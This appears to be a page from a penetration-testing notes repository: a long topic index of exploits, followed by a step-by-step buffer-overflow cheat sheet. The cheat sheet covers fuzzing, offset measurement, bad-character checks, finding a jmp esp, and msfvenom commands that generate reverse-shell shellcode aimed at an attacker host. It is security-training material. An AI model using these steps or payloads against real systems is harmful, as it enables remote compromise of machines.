Enumeration

Containers

Docs

Snmp

Network_scanners

Windows

Exploit

CPUs

meltdown

Binaries

Shellcode
aslr

Buffer_overflow

Docs

ropping

Canary_bypass

canary_bypass

Format_string

format_string

Integral_promotion

integral_promotion

Dns

zone_transfer

Hashes

collision

Imagemagick

imagetragick

Java

OGNL

cve_2022_26134

Level3_hypervisor

Docker_sec

docker

Linux

capabilities

Dirty_pipe

dirty_pipe

Pkexec

CVE_2021_4034

Sudo

wildard_exploitation

MacOS

Network

mac_spoofing

Padding

padbuster

Python

Samba

smbmap

Sqli

Ssl_tls

heartbleed

Web

Bypass_rate_limiting

bypass_rate_limiting

command_injection

Content_security_policy

content_security_policy

cookie_tampering
csrf

Forced_browsing

forced_browsing

http_header_injection

Idor

idor

Javascript

Jwt

local_file_inclusion
methodology

Nodejs

deserialization

Php

re_registration
remote_file_inclusion

Ssrf

Ssti

ssti

Xxe

Windows

Portable Executables

Shellcode

Dll_hijacking

dll_hijacking

Docs

Macros

macros

Payloads

windows_scripting_host

Print_nightmare

CVE-2021-1675

Nightmare-dll

print_nightmare

Process_injection

Service_escalation

service_escalation

Zero_logon

zero_logon

Yaml

deserialization

Forensics

Hashes

Bruteforce

patator

Password_cracking

Password_guessing

standard_passwords

Persistence

Post exploitation

Seatbelt

.github

ISSUE_TEMPLATE

CHANGELOG

Seatbelt

Commands

Windows

EventLogs

Output

Bc_security

Docs

Windows

pivoting

Priv_esc

Docs

linux_priv_esc
pspy

Windows

Kernel-exploits

Privesc-scripts

Docs

get_script_onto_target

Suid

Reverse engineering

Android

misc

Docs

Java

krakatau

Windows

portable-executable

Reverse shells

Docs

firewalls

Windows

Buffer Overflow
Usage

Buffer Overflow

Cheat Sheet

Usage

Fuzz & crash the binary pretty roughly via payload

python -c "print('A' * 3000)

Fuzzing

python 3 ../fuzzer.py
python 2 ../fuzzer2.py

Measure Offset

Use as payload

/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>

Find content of the payload at EIP and identify exact bufferlength

/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>

msf-pattern_offset -l <bufferlength> -q <EIP>

mona msfpattern -l <bufferlength>

Fill offset variable in exploit buffer_overflow.py ../buffer_overflow.py
Execute buffer_overflow.py, EIP should contain BBBB

Find bad characters to input in the buffer

Execute bad_chars.py and include it as payload. Always excluded is \x00. ../bad_chars.py
Compare stack if any bad chars block exectuion of the payload following in the next steps.

!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>

Find Jump Point / RoP

Jump point to ESP (32 bit binary) needs to be found to put it inside EIP

Example: Immunity Debugger using mona on windows machine

!mona modules

!mona jmp -r esp -m <exploitable_bin_from_modules>

The found address needs to be LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE if x86/amd64

Shellcode as Payload

Last part is the individual shellcode, put it in the payload variable of buffer_overflow.py

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"

Prepend NOPs as padding before shellcode